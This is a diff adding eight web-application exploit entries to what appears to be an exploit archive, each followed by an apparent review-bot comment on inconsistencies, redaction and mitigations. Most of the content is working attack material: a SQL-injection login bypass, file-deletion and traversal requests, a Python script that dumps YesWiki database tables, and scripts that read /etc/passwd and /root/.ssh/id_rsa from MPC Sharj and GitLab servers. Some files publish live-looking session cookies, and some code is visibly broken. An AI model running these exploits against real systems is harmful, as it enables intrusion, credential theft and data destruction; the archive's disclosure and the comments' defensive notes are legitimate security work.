diff --git a/exploits/php/webapps/48426.txt b/exploits/php/webapps/48426.txt
new file mode 100644
index 000000000..d167c6bdd
--- /dev/null
+++ b/exploits/php/webapps/48426.txt
@@ -0,0 +1,21 @@
+# Exploit Title: Online Clothing Store 1.0 - Persistent Cross-Site Scripting
+# Date: 2020-05-05
+# Exploit Author: Sushant Kamble
+# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+#Vulnerable Page: Offers.php
+#Parameter Vulnerable: Offer Detail
+
+ONLINE CLOTHING STORE 1.0 is vulnerable to Stored XSS
+
+Admin user can add malicious script to offer page.
+when a normal user visit a page. A script gets executed.
+
+# Exploit:
+ Open offer.php
+ Add below script in Offer Detail
+
+ Save
\ No newline at end of file
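Review bot: The steps under `# Exploit:` say "Add below script in Offer Detail" but the next line is empty, so the entry refers to content that is not in the file as shown (it may have been stripped on ingestion), and the page name differs between `#Vulnerable Page: Offers.php` and `Open offer.php`. The write-up depends on an admin account storing the value, which the title does not state. There is no remediation note; I would add `# Mitigation: HTML-encode Offer Detail on output (htmlspecialchars with ENT_QUOTES) and restrict who may edit offers`.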
diff --git a/exploits/php/webapps/48427.txt b/exploits/php/webapps/48427.txt
new file mode 100644
index 000000000..65cbf71fe
--- /dev/null
+++ b/exploits/php/webapps/48427.txt
@@ -0,0 +1,34 @@
+# Exploit Title: i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion
+# Date: 2020-05-02
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.i-doit.org/
+# Software Link: https://sourceforge.net/projects/i-doit/
+# Version: v1.14.1
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+--------------------------------------------------------------------------------------------------
+
+Vulnerable Module ---> Import Module
+Vulnerable parameter ---> delete_import
+-----------
+PoC
+-----------
+
+POST /idoit/?moduleID=50¶m=1&treeNode=501&mNavID=2 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 ******************************
+Accept: text/javascript, text/html, application/xml, text/xml, */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/idoit/?moduleID=50¶m=1&treeNode=501&mNavID=2
+X-Requested-With: XMLHttpRequest
+X-Prototype-Version: 1.7.3
+Content-type: application/x-www-form-urlencoded; charset=UTF-8
+X-i-doit-Tenant-Id: 1
+Content-Length: 30
+DNT: 1
+Connection: close
+Cookie: PHPSESSID=bf21********************************68b8
+
+delete_import=Type the filename, you want to delete from the server here
\ No newline at end of file
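Review bot: The request line and the `Referer` header contain `¶m=1`, which looks like a mis-decoded `&param=1`, and `Content-Length: 30` does not match the placeholder body on the last line, so this is not a faithful capture. The entry also omits which role the session needs and whether `delete_import` is confined to the import directory. The relevant control is server-side: reduce `delete_import` to a basename and confirm the resolved path lies inside the import upload directory before deleting. I would add `# Mitigation: validate delete_import against the list of uploaded import files`.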
diff --git a/exploits/php/webapps/48428.txt b/exploits/php/webapps/48428.txt
new file mode 100644
index 000000000..2edf57425
--- /dev/null
+++ b/exploits/php/webapps/48428.txt
@@ -0,0 +1,32 @@
+# Exploit Title: Booked Scheduler 2.7.7 - Authenticated Directory Traversal
+# Date: 2020-05-03
+# Author: Besim ALTINOK
+# Vendor Homepage: https://www.bookedscheduler.com
+# Software Link: https://sourceforge.net/projects/phpscheduleit/
+# Version: v2.7.7
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+Description:
+----------------------------------------------------------
+Vulnerable Parameter: $tn
+Vulnerable File: manage_email_templates.php
+
+
+PoC
+-----------
+
+GET
+/booked/Web/admin/manage_email_templates.php?dr=template&lang=en_us&tn=vulnerable-parameter&_=1588451710324
+HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 ***************************
+Accept: */*
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://localhost/booked/Web/admin/manage_email_templates.php
+X-Requested-With: XMLHttpRequest
+DNT: 1
+Connection: close
+Cookie: new_version=v%3D2.7.7%2Cfs%3D1588451441;
+PHPSESSID=94129ac9414baee8c6ca2f19ab0bcbec
\ No newline at end of file
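Review bot: The `Cookie` header at the end of this request publishes a full `PHPSESSID` value, whereas 48427.txt masks its session id with asterisks; 48429.txt (`PHPSESSID`) and 48430.txt (`webTareasSID`, `PHPSESSIDwebERPteam`) do the same. These look like throwaway localhost sessions, but archived captures should be redacted consistently, e.g. `Cookie: PHPSESSID=<redacted>`. The entry also names `$tn` without describing the impact or the admin role implied by the `/admin/` path. I would add `# Mitigation: resolve tn against an allow-list of template names inside the template directory`.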
diff --git a/exploits/php/webapps/48429.txt b/exploits/php/webapps/48429.txt
new file mode 100644
index 000000000..48861bb0d
--- /dev/null
+++ b/exploits/php/webapps/48429.txt
@@ -0,0 +1,27 @@
+# Exploit Title: Online Clothing Store 1.0 - 'username' SQL Injection
+# Date: 2020-05-05
+# Exploit Author: Sushant Kamble
+# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip
+# Version: 1.0
+# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4
+
+---------------------------------------------------------------------------------
+
+#parameter Vulnerable: username
+# Injected Request
+POST /online%20Clothing%20Store/login.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 55
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/online%20Clothing%20Store/
+Cookie: PHPSESSID=shu3nbnsdkb4nb73iips4jkrn7
+Upgrade-Insecure-Requests: 1
+
+txtUserName=admin'or''='&txtPassword=anything&rdType=Admin&button=Login
\ No newline at end of file
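Review bot: The title and `#parameter Vulnerable: username` name a parameter that does not appear in the request; the posted field is `txtUserName`, and the header should use that name so the entry can be matched against logs and WAF rules. `Content-Length: 55` also does not match the body shown. The write-up has no remediation note; I would add `# Mitigation: use prepared statements for the login query and check passwords with password_verify()`.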
diff --git a/exploits/php/webapps/48430.txt b/exploits/php/webapps/48430.txt
new file mode 100644
index 000000000..c86a85837
--- /dev/null
+++ b/exploits/php/webapps/48430.txt
@@ -0,0 +1,75 @@
+# Exploit Title: webTareas 2.0.p8 - Arbitrary File Deletion
+# Date: 2020-05-02
+# Author: Besim ALTINOK
+# Vendor Homepage: https://sourceforge.net/projects/webtareas/files/
+# Software Link: https://sourceforge.net/projects/webtareas/files/
+# Version: v2.0.p8
+# Tested on: Xampp
+# Credit: İsmail BOZKURT
+
+
+Description:
+--------------------------------------------------------------------------------------
+
+- print_layout.php is vulnerable. When you sent PoC code to the server and
+If there is no file on the server, you can see, this error message
+
+
+Warning:
+ unlink(/Applications/XAMPP/xamppfiles/htdocs/webtareas/files/PrintLayouts/tester.png.php--1.zip):
+No such file or directory in
+/Applications/XAMPP/xamppfiles/htdocs/webtareas/includes/library.php
+on line 1303
+
+- So, Here, you can delete file with unlink function.
+- And, I ddi try again with another file, I deleted from the server.
+--------------------------------------------------------------------------------------------
+
+Arbitrary File Deletion PoC
+---------------------------------------------------------------------------------------
+
+POST
+/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&id=1&mode=edit&borne1=0
+HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 ***********************
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer:
+http://localhost/webtareas/administration/print_layout.php?doc_type=11&doc_type_ex=&mode=edit&borne1=0&id=1
+Content-Type: multipart/form-data;
+boundary=---------------------------3678767312987982041084647942
+Content-Length: 882
+DNT: 1
+Connection: close
+Cookie: webTareasSID=4b6a4799c9e7906a06c574dc48ffb730;
+PHPSESSIDwebERPteam=9b2b068ea2de93ed1ee0aafe27818191
+Upgrade-Insecure-Requests: 1
+
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="action"
+
+edit
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="desc"
+
+
tester
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="file1"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="attnam1"
+
+
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="atttmp1"
+
+--add the delete file name here--
+-----------------------------3678767312987982041084647942
+Content-Disposition: form-data; name="sp"
+
+
+-----------------------------3678767312987982041084647942--
\ No newline at end of file
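Review bot: The description attributes the deletion to `unlink()` at `includes/library.php` line 1303 but never names the request field involved; from the PoC it appears to be the multipart field `atttmp1`, and the header should say so along with the role required for `/administration/print_layout.php`. The quoted warning shows the value being joined into a path under `files/PrintLayouts/`, so the entry should state whether deletion is confined to that directory. I would add `# Mitigation: ignore client-supplied atttmp1; look the temporary file name up server-side and check the resolved path stays inside files/PrintLayouts before unlink()`. Typos such as `I ddi try` could be fixed in the same pass.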
diff --git a/exploits/php/webapps/48432.txt b/exploits/php/webapps/48432.txt
new file mode 100644
index 000000000..70c359c59
--- /dev/null
+++ b/exploits/php/webapps/48432.txt
@@ -0,0 +1,134 @@
+# Exploit Title: YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection
+# Date: 2020-04-25
+# Exploit Author: coiffeur
+# Vendor Homepage: https://yeswiki.net/
+# Software Link: https://yeswiki.net/, https://github.com/YesWiki/yeswiki
+# Version: YesWiki cercopitheque < 2020-04-18-1
+
+import sys
+
+import requests
+
+DEBUG = 0
+
+
+def usage():
+ banner = """NAME: YesWiki cercopitheque 2020-04-18-1, SQLi
+SYNOPSIS: python sqli_2020.04.18.1.py [OPTIONS]...
+DESCRIPTION:
+ -lt, list tables.
+ -dt , dump table.
+AUTHOR: coiffeur
+ """
+ print(banner)
+
+
+def parse(text):
+ deli_l = 'ABCAABBCC|'
+ deli_r = '|ABCAABBCC'
+ if (text.find(deli_l) == -1) or (text.find(deli_r) == -1):
+ print('[x] Delimiter not found, please try to switch to a Time Based SQLi')
+ exit(-1)
+ start = text.find(deli_l) + len(deli_l)
+ end = start + text[start::].find(deli_r)
+ return text[start:end]
+
+
+def render(elements):
+ print(elements)
+
+def get_count(t_type, table_name=None, column_name=None):
+ if t_type == 'table':
+ payload = '?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(TABLE_NAME),0x7c,0x414243414142424343) FROM information_schema.tables),NULL,NULL,NULL,NULL,NULL-- -'
+ if DEBUG > 1:
+ print(f'[DEBUG] {payload}')
+ r = requests.get(url=f'{sys.argv[1]}{payload}')
+ if r.status_code == 200:
+ data = parse(r.text)
+ if t_type == 'column':
+ payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(COLUMN_NAME),0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}"),NULL,NULL,NULL,NULL,NULL-- -'
+ if DEBUG > 1:
+ print(f'[DEBUG] {payload}')
+ r = requests.get(url=f'{sys.argv[1]}{payload}')
+ data = parse(r.text)
+ if t_type == 'element':
+ payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count({column_name}),0x7c,0x414243414142424343) FROM {table_name}),NULL,NULL,NULL,NULL,NULL-- -'
+ if DEBUG > 1:
+ print(f'[DEBUG] {payload}')
+ r = requests.get(url=f'{sys.argv[1]}{payload}')
+ data = parse(r.text)
+ return int(data)
+
+
+def list_tables():
+ tables_count = get_count(t_type='table')
+ print(f'[+] Tables found: {tables_count}')
+
+ tables = []
+ for i in range(0, tables_count):
+ payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,TABLE_NAME,0x7c,0x414243414142424343) FROM information_schema.tables LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
+ if DEBUG > 1:
+ print(f'[DEBUG] {payload}')
+ r = requests.get(url=f'{sys.argv[1]}{payload}')
+ if r.status_code == 200:
+ talbe = parse(r.text)
+ print(f'\t{talbe}')
+ tables.append(talbe)
+ return tables
+
+
+def list_columns(table_name):
+ columns_count = get_count(t_type='column', table_name=table_name)
+ print(f'[+] Columns found: {columns_count}')
+
+ columns = []
+ for i in range(0, columns_count):
+ payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,COLUMN_NAME,0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}" LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
+ if DEBUG > 1:
+ print(f'[DEBUG] {payload}')
+ r = requests.get(url=f'{sys.argv[1]}{payload}')
+ if r.status_code == 200:
+ column = parse(r.text)
+ if DEBUG > 0:
+ print(f'\t{column}')
+ columns.append(column)
+ return columns
+
+
+def dump_table(name):
+ columns = list_columns(name)
+ elements = [None]*len(columns)
+ for i in range(0, len(columns)):
+ elements_count = get_count(
+ t_type='element', table_name=name, column_name=columns[i])
+ if DEBUG > 0:
+ print(f'[+] Dumping: {columns[i]} ({elements_count} rows)')
+ element = []
+ for j in range(0, elements_count):
+ payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,{columns[i]},0x7c,0x414243414142424343) FROM {name} LIMIT 1 OFFSET {j}),NULL,NULL,NULL,NULL,NULL-- -'
+ if DEBUG > 1:
+ print(f'[DEBUG] {payload}')
+ r = requests.get(url=f'{sys.argv[1]}{payload}')
+ if r.status_code == 200:
+ element.append(parse(r.text))
+ if DEBUG > 0:
+ print(f'\t{element[-1]}')
+ elements[i] = element
+ render(elements)
+ return elements
+
+
+def main():
+ if len(sys.argv) < 3:
+ print(usage())
+ exit(-1)
+
+ if sys.argv[2] == '-lt':
+ list_tables()
+
+ if sys.argv[2] == '-dt':
+ dump_table(sys.argv[3])
+
+
+if __name__ == "__main__":
+ main()
\ No newline at end of file
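Review bot: The header is inconsistent about the affected release: the title says `2020.04.18.1` while `# Version:` says `< 2020-04-18-1`, and no fixed version or vendor advisory is referenced. The file is a Python script stored with a `.txt` extension under `php/webapps`, which the header should mention. For detection, every request built here carries the constant marker `0x414243414142424343` and `id=-9475 UNION ALL SELECT` on the `vue=consulter` route, so those strings are usable log and WAF signatures. I would add `# Mitigation: upgrade to a release after <FIXED_VERSION>; the id parameter must be cast to an integer or bound as a query parameter`.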
diff --git a/exploits/php/webapps/48433.txt b/exploits/php/webapps/48433.txt
new file mode 100644
index 000000000..1ba45ee64
--- /dev/null
+++ b/exploits/php/webapps/48433.txt
@@ -0,0 +1,69 @@
+# Exploit title : MPC Sharj 3.11.1 - Arbitrary File Download
+# Exploit Author : SajjadBnd
+# Date : 2020-05-02
+# Software Link : http://dl.nuller.ir/mpc-sharj-vr_3.11.1_beta[www.nuller.ir].zip
+# Tested on : Ubuntu 19.10
+# Version : 3.11.1 Beta
+############################
+#
+# [ DESCRIPTION ]
+#
+# MPC Sharj is a free open source script for creating sim card credit card's shop.
+#
+# [POC]
+#
+# Vulnerable file: download.php
+# parameter : GET/ "id"
+# 69: readfile readfile($file);
+# 55: $file = urldecode(base64_decode(strrev($file)));
+# 53: $file = trim(strip_tags($_GET['id']));
+#
+# payload : [
+# Steps:
+#
+# 1. convert your payload (/etc/passwd) to base64 (L2V0Yy9wYXNzd2Q=)
+# 2. convert base64 result (L2V0Yy9wYXNzd2Q=) to strrev (=Q2dzNXYw9yY0V2L)
+# 3. your payload is ready ;D
+# http://localhost/download.php?id==Q2dzNXYw9yY0V2L
+#
+#]
+#
+
+import requests
+import os
+from base64 import b64encode
+
+def clear():
+linux = 'clear'
+windows = 'cls'
+os.system([linux, windows][os.name == 'nt'])
+
+def banner():
+print '''
+##############################################################
+##############################################################
+#### # ######### # #### ######### #####
+#### ### ###### ## #### ###### #### ############# #####
+#### #### #### ### #### ###### #### ###################
+#### ##### ## #### #### ####### ###################
+#### ###### ##### #### ############ ###################
+#### ############### #### ############ ############# #####
+#### ############### #### ##666######### ######
+##############################################################
+##############################################################
+###### MPC Sharj 3.11.1 Beta - Arbitrary File Download #####
+##############################################################
+'''
+
+def exploit():
+target = raw_input('[+] Target(http://example.com) => ')
+read_file = raw_input('[+] File to Read => ')
+read_file = b64encode(read_file)
+target = target+"/download.php?id"+read_file[::-1]
+r = requests.get(target,timeout=500)
+print "\n"+r.text
+
+if __name__ == '__main__':
+clear()
+banner()
+exploit()
\ No newline at end of file
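Review bot: The script body has lost its indentation (the lines under `def clear():`, `def banner():` and `def exploit():` start at column 0) and uses Python 2 syntax (`print '''`, `raw_input`), neither of which the header mentions. The header does quote the root cause in download.php (`$_GET['id']` passed through `strrev`, `base64_decode` and `urldecode` into `readfile($file)`) but gives no fix; I would add `# Mitigation: map id to a stored file record, or realpath() the decoded value and require it to stay under the download directory`. For log review, the `id` value of `download.php` requests can be reversed and base64-decoded to check for absolute paths or `..` segments. The line `# 69: readfile readfile($file);` also repeats a word.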
diff --git a/exploits/ruby/webapps/48431.txt b/exploits/ruby/webapps/48431.txt
new file mode 100644
index 000000000..7eb8f50df
--- /dev/null
+++ b/exploits/ruby/webapps/48431.txt
@@ -0,0 +1,251 @@
+# Exploit Title: GitLab 12.9.0 - Arbitrary File Read
+# Google Dork: -
+# Date: 2020-05-03
+# Exploit Author: KouroshRZ
+# Vendor Homepage: https://about.gitlab.com
+# Software Link: https://about.gitlab.com/install
+# Version: tested on gitlab version 12.9.0
+# Tested on: Ubuntu 18.04 (but it's OS independent)
+# CVE : -
+
+#####################################################################################################
+# #
+# Copyright (c) 2020, William Bowling of Biteable, a.k.a vakzz #
+# All rights reserved. #
+# #
+# Redistribution and use in source and compiled forms, with or without modification, are permitted #
+# provided that the following conditions are met: #
+# #
+# * Redistributions of source code must retain the above copyright notice, this list of #
+# conditions and the following disclaimer. #
+# #
+# * Redistributions in compiled form must reproduce the above copyright notice, this list of #
+# conditions and the following disclaimer in the documentation and/or other materials provided #
+# with the distribution. #
+# #
+# * Neither the name of William Bowling nor the names of Biteable, a.k.a vakzz may be used to #
+# endorse or promote products derived from this software without specific prior written permission. #
+# #
+#####################################################################################################
+
+# Exploit Title: automated exploit for Arbitrary file read via the UploadsRewriter when moving and issue in private gitlab server
+# Google Dork: -
+# Date: 05/03/2020
+# Exploit Author: KouroshRZ
+# Vendor Homepage: https://about.gitlab.com
+# Software Link: https://about.gitlab.com/install
+# Version: tested on gitlab version 12.9.0
+# Tested on: Ubuntu 18.04 (but it's OS independent)
+# CVE : -
+
+import requests
+import json
+from time import sleep
+
+# For debugging
+proxies = {
+ 'http' : '127.0.0.1:8080',
+ 'https' : '127.0.0.1:8080'
+}
+
+session = requests.Session()
+
+# config
+host = 'http[s]://'
+username = ''
+password = ''
+lastIssueUrl = ""
+
+def loginToGitLab(username, password):
+
+ initLoginUrl = '{}/users/sign_in'.format(host)
+
+ initLoginResult = session.get(initLoginUrl).text
+
+ temp_index_csrf_param_start = initLoginResult.find("csrf-param")
+ temp_index_csrf_param_end = initLoginResult.find("/>", temp_index_csrf_param_start)
+ csrf_param = initLoginResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2]
+
+ temp_index_csrf_token_start = initLoginResult.find("csrf-token")
+ temp_index_csrf_token_end = initLoginResult.find("/>", temp_index_csrf_token_start)
+ csrf_token = initLoginResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]
+
+ # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")
+
+ submitLoginUrl = '{}/users/auth/ldapmain/callback'.format(host)
+
+ submitLoginData = {
+ 'utf8=' : '✓',
+ csrf_param : csrf_token,
+ 'username' : username,
+ 'password' : password,
+ }
+
+ submitLoginResult = session.post(submitLoginUrl, submitLoginData, allow_redirects=False)
+
+ if submitLoginResult.status_code == 302 and submitLoginResult.text.find('redirected') > -1:
+ print("[+] You'e logged in ...")
+
+
+def createNewProject(projectName):
+
+
+ initProjectUrl = '{}/projects/new'.format(host)
+
+ initProjectResult = session.get(initProjectUrl).text
+
+ temp_index_csrf_param_start = initProjectResult.find("csrf-param")
+ temp_index_csrf_param_end = initProjectResult.find("/>", temp_index_csrf_param_start)
+ csrf_param = initProjectResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2]
+
+ temp_index_csrf_token_start = initProjectResult.find("csrf-token")
+ temp_index_csrf_token_end = initProjectResult.find("/>", temp_index_csrf_token_start)
+ csrf_token = initProjectResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]
+
+ # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")
+
+ tmp_index_1 = initProjectResult.find('{}/{}/\n'.format(host, username))
+ tmp_index_2 = initProjectResult.find('value', tmp_index_1)
+ tmp_index_3 = initProjectResult.find('type', tmp_index_2)
+ namespace = initProjectResult[tmp_index_2 + 7 : tmp_index_3 - 2]
+
+ createProjectUrl = '{}/projects'.format(host)
+ createProjectData = {
+ 'utf8=' : '✓',
+ csrf_param : csrf_token,
+ 'project[ci_cd_only]' : 'false',
+ 'project[name]' : projectName,
+ 'project[namespace_id]' : namespace,
+ 'project[path]' : projectName,
+ 'project[description]' : '',
+ 'project[visibility_level]' : '0'
+ }
+
+ createProjectResult = session.post(createProjectUrl, createProjectData, allow_redirects=False)
+
+ if createProjectResult.status_code == 302:
+
+ print("[+] New Project {} created ...".format(projectName))
+
+def createNewIssue(projectName, issueTitle, file):
+
+ global lastIssueUrl
+
+ initIssueUrl = '{}/{}/{}/-/issues/new'.format(host, username, projectName)
+
+ initIssueResult = session.get(initIssueUrl).text
+
+ temp_index_csrf_param_start = initIssueResult.find("csrf-param")
+ temp_index_csrf_param_end = initIssueResult.find("/>", temp_index_csrf_param_start)
+ csrf_param = initIssueResult[temp_index_csrf_param_start + 21 : temp_index_csrf_param_end - 2]
+
+ temp_index_csrf_token_start = initIssueResult.find("csrf-token")
+ temp_index_csrf_token_end = initIssueResult.find("/>", temp_index_csrf_token_start)
+ csrf_token = initIssueResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]
+
+ # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")
+
+ createIssueUrl = '{}/{}/{}/-/issues'.format(host , username, projectName)
+
+ createIssueData = {
+ 'utf8=' : '✓',
+ csrf_param : csrf_token,
+ 'issue[title]' : issueTitle,
+ 'issue[description]' : ''.format(file),
+ 'issue[confidential]' : '0',
+ 'issue[assignee_ids][]' : '0',
+ 'issue[label_ids][]' : '',
+ 'issue[due_date]' : '',
+ 'issue[lock_version]' : '0'
+ }
+
+ createIssueResult = session.post(createIssueUrl, createIssueData, allow_redirects=False)
+
+ if createIssueResult.status_code == 302:
+
+ print("[+] New issue for {} created ...".format(projectName))
+ tmp_index_1 = createIssueResult.text.find("href")
+ tmp_index_2 = createIssueResult.text.find("redirected")
+ lastIssueUrl = createIssueResult.text[tmp_index_1 + 6: tmp_index_2 - 2]
+ print("[+] url of craeted issue : {}\n".format(lastIssueUrl))
+
+def moveLastIssue(source, destination, file):
+
+ # Get destination project ID
+
+ getProjectIdUrl = '{}/{}/{}'.format(host, username, destination)
+ getProjectIdResult = session.get(getProjectIdUrl).text
+
+ tmpIndex = getProjectIdResult.find('/search?project_id')
+ projectId = getProjectIdResult[tmpIndex + 19 : tmpIndex + 21]
+ #print("Project : {} ID ----> {}\n".format(destination, projectId))
+
+ # Get CSRF token for moving issue
+ # initIssueMoveUrl = '{}/{}/{}/-/issues/{}'.format(host, username, source, issue)
+ initIssueMoveUrl = lastIssueUrl
+ initIssueMoveResult = session.get(initIssueMoveUrl).text
+
+ temp_index_csrf_token_start = initIssueMoveResult.find("csrf-token")
+ temp_index_csrf_token_end = initIssueMoveResult.find("/>", temp_index_csrf_token_start)
+ csrf_token = initIssueMoveResult[temp_index_csrf_token_start + 21 : temp_index_csrf_token_end - 2]
+
+ # print("Took csrf toke ----> " + csrf_param + " : " + csrf_token + "\n")
+
+ # Move issue with associated CSRF token
+ # moveIssueUrl = "{}/{}/{}/-/issues/{}/move".format(host, username, source, issue)
+ moveIssueUrl = lastIssueUrl + "/move"
+ moveIssueData = json.dumps({
+ "move_to_project_id" : int(projectId)
+ })
+ headers = {
+ 'X-CSRF-Token' : csrf_token,
+ 'X-Requested-With' : 'XMLHttpRequest',
+ 'Content-Type' : 'application/json;charset=utf-8'
+ }
+ moveIssueResult = session.post(moveIssueUrl, headers = headers, data = moveIssueData, allow_redirects = False)
+
+ if moveIssueResult.status_code == 500:
+ print("[!] Permission denied for {}".format(file))
+ else:
+ description = json.loads(moveIssueResult.text)["description"]
+ tmp_index = description.find("/")
+ fileUrl = "{}/{}/{}/{}".format(host, username, destination, description[tmp_index+1:-1])
+
+ print("[+] url of file {}: \n".format(f, fileUrl))
+ fileContentResult = session.get(fileUrl)
+
+ if fileContentResult.status_code == 404:
+ print("[-] No such file or directory : {}".format(f))
+ else:
+ print("[+] Content of file {} read from server ...\n\n".format(f))
+ print(fileContentResult.text)
+
+ print("\n****************************************************************************************\n")
+
+
+
+if __name__ == "__main__":
+
+ loginToGitLab(username, password)
+
+ createNewProject("project_01")
+ createNewProject("project_02")
+
+ # Put the files you want to read from server here
+ # The files on server should have **4 or more permission (world readable files)
+ files = {
+ '/etc/passwd',
+ '/etc/ssh/sshd_config',
+ '/etc/ssh/ssh_config',
+ '/root/.ssh/id_rsa',
+ '/var/log/auth.log'
+ # ...
+ # ...
+ # ...
+ }
+
+
+ for f in files:
+ createNewIssue("project_01", "issue01_{}".format(f), f)
+ moveLastIssue("project_01", "project_02",f)
+ sleep(3)
\ No newline at end of file
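Review bot: The header block is duplicated (the `# Exploit Title:` group appears twice, with dates `2020-05-03` and `05/03/2020`), `# CVE : -` is left empty, and the licence box refers to "the following disclaimer" that is not included while naming a copyright holder different from the listed exploit author. No fixed GitLab version is given; I would add `# Fixed in: <FIXED_VERSION> (see vendor advisory <ADVISORY_URL>)`. In the code, `proxies` is defined but never passed to `session`, and `moveLastIssue` reads the global `f` instead of its `file` parameter. For defenders, the script treats HTTP 500 from the issue `/move` endpoint as an unreadable file, so bursts of 500s on issue moves between two freshly created projects owned by one user are a reasonable detection signal.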
diff --git a/files_exploits.csv b/files_exploits.csv
index 82e11bce7..88b87f0df 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -42658,3 +42658,11 @@ id,file,description,date,author,type,platform,port
48423,exploits/php/webapps/48423.txt,"PhreeBooks ERP 5.2.5 - Remote Command Execution",2020-05-05,Besim,webapps,php,
48424,exploits/php/webapps/48424.txt,"SimplePHPGal 0.7 - Remote File Inclusion",2020-05-05,h4shur,webapps,php,
48425,exploits/hardware/webapps/48425.txt,"NEC Electra Elite IPK II WebPro 01.03.01 - Session Enumeration",2020-05-05,"Cold z3ro",webapps,hardware,
+48426,exploits/php/webapps/48426.txt,"Online Clothing Store 1.0 - Persistent Cross-Site Scripting",2020-05-06,"Sushant Kamble",webapps,php,
+48427,exploits/php/webapps/48427.txt,"i-doit Open Source CMDB 1.14.1 - Arbitrary File Deletion",2020-05-06,Besim,webapps,php,
+48428,exploits/php/webapps/48428.txt,"Booked Scheduler 2.7.7 - Authenticated Directory Traversal",2020-05-06,Besim,webapps,php,
+48429,exploits/php/webapps/48429.txt,"Online Clothing Store 1.0 - 'username' SQL Injection",2020-05-06,"Sushant Kamble",webapps,php,
+48430,exploits/php/webapps/48430.txt,"webTareas 2.0.p8 - Arbitrary File Deletion",2020-05-06,Besim,webapps,php,
+48431,exploits/ruby/webapps/48431.txt,"GitLab 12.9.0 - Arbitrary File Read",2020-05-06,KouroshRZ,webapps,ruby,
+48432,exploits/php/webapps/48432.txt,"YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection",2020-05-06,coiffeur,webapps,php,
+48433,exploits/php/webapps/48433.txt,"MPC Sharj 3.11.1 - Arbitrary File Download",2020-05-06,SajjadBnd,webapps,php,